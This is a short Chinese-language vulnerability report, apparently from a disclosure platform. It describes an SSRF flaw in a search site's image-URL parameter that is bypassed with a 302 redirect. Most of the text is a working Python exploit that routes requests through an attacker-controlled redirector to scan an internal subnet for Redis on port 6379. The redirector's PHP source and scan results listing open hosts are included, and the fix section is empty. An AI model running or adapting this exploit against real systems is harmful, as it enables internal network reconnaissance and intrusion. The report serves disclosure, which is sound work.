漏洞地址:http://st.so.com
利用302绕过http协议限制
#!/usr/bin/env python
# -*- coding: utf-8 -*-
# @Author: Lcy
# @Date: 2016-07-05 20:55:30
# @Last Modified by: Lcy
import requests
import threading
import Queue
import random
import time
url = "http://st.so.com/stu"
threads_count = 3
que = Queue.Queue()
lock = threading.Lock()
threads = []
ip = "10.121.3."
def getIp():
return str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254)) + '.' + str(random.randint(1, 254))
headers = {
"Cache-Control":"max-age=0",
"Accept":"text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
"User-Agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.110 Safari/537.36",
"Cookie": "__guid=6491553.4279294988408965000.1467944097350.527; PHPSESSID=d88gvotjet30c0cp28iuv1s771; count=45",
"Content-Type":"application/x-www-form-urlencoded",
"X-Forwarded-For":getIp(),
}
for i in range(1,255):
que.put(ip + str(i))
def run():
while que.qsize() > 0:
ip = que.get()
try:
payload = "http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg".format(
ip=ip,
port="65321")
param = {"imgurl":payload}
r = requests.post(url,data=param,headers = headers,timeout=2.2)
try:
payload = "http://tv.phpinfo.me/exp.php?s=ftp%26ip={ip}%26port={port}%26data=helo.jpg".format(
ip=ip,
port="6379")
param = {"imgurl":payload}
r = requests.post(url,data=param,headers=headers,timeout=2.2)
lock.acquire()
print ip
lock.release()
except :
lock.acquire()
print "{ip} 6379 Open".format(ip=ip)
lock.release()
except:
pass
for i in range(threads_count):
t = threading.Thread(target=run)
threads.append(t)
t.setDaemon(True)
t.start()
while que.qsize() > 0:
time.sleep(1.0)
exp.php源码:
$ip = $_GET['ip'];
$port = $_GET['port'];
$scheme = $_GET['s'];
$data = $_GET['data'];
header("Location: $scheme://$ip:$port/$data");
?>
10.121.3.1
10.121.3.2
10.121.3.3
10.121.3.4
10.121.3.5
10.121.3.6
10.121.3.9 6379 Open
10.121.3.11
10.121.3.14
10.121.3.13
10.121.3.15
10.121.3.18
10.121.3.16 6379 Open
10.121.3.21
10.121.3.20
10.121.3.24
10.121.3.23 6379 Open
10.121.3.25 6379 Open
10.121.3.28
10.121.3.29
10.121.3.32 6379 Open
10.121.3.34
10.121.3.35
10.121.3.36
10.121.3.37
10.121.3.38
10.121.3.39
10.121.3.41
10.121.3.42
10.121.3.230
10.121.3.231
10.121.3.232
10.121.3.233
10.121.3.234
10.121.3.235
10.121.3.236
10.121.3.237
10.121.3.238
10.121.3.239
10.121.3.240
10.121.3.241
10.121.3.242
10.121.3.243
10.121.3.244
10.121.3.245
10.121.3.246
10.121.3.247
就不深入利用了
解决方案: